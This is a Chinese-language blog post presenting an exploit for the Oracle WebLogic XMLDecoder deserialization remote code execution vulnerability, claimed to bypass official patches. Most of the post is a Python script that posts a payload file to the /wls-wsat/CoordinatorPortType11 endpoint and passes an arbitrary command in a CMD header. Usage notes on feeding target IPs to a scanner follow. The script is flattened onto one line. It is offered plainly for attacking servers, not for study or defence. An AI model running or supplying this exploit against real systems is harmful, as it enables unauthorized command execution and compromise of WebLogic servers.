Weblogic反序列化远程代码执行漏洞exp

作者:小俊 分类: WEB漏洞大全 发布于:2020-2-27 14:58 ė449次浏览 60条评论

利用点是weblogic的xmldecoder反序列化漏洞,只是构造巧妙的利用链对Oracle官方历年来对这个漏洞点的补丁绕过

主要来还是懒  废话不多说直接上exp和poc 吧  poc并不通用 更多用exp吧 

IP填入ip.txt 后用poc检测

exp:

import requests import sys def exec_cmd(ip,cmd): url="http://"+ip+"/wls-wsat/CoordinatorPortType11" headers={ 'User-Agent': 'Apache-HttpClient/4.1.1 (java 1.5)', 'CMD' : cmd, 'SOAPAction':'""', 'Content-Type':'text/xml' } with open('payload.txt','rb') as f : payloads=f.read() r=requests.post(url,headers=headers,data=payloads) return r.content.decode() def main(): if len(sys.argv)<3: print('usage:exp.py www.0dayhack.com:8080 whoami') sys.exit() ip=sys.argv[1] cmd=sys.argv[2] out=exec_cmd(ip,cmd) print(out) if __name__ == '__main__': main()


注意:

只支持Py3

ip.txt是放检测的


本文出自 小俊博客,转载时请注明出处及相应链接。

0

发表评论

电子邮件地址不会被公开。必填项已用*标注


Ɣ回顶部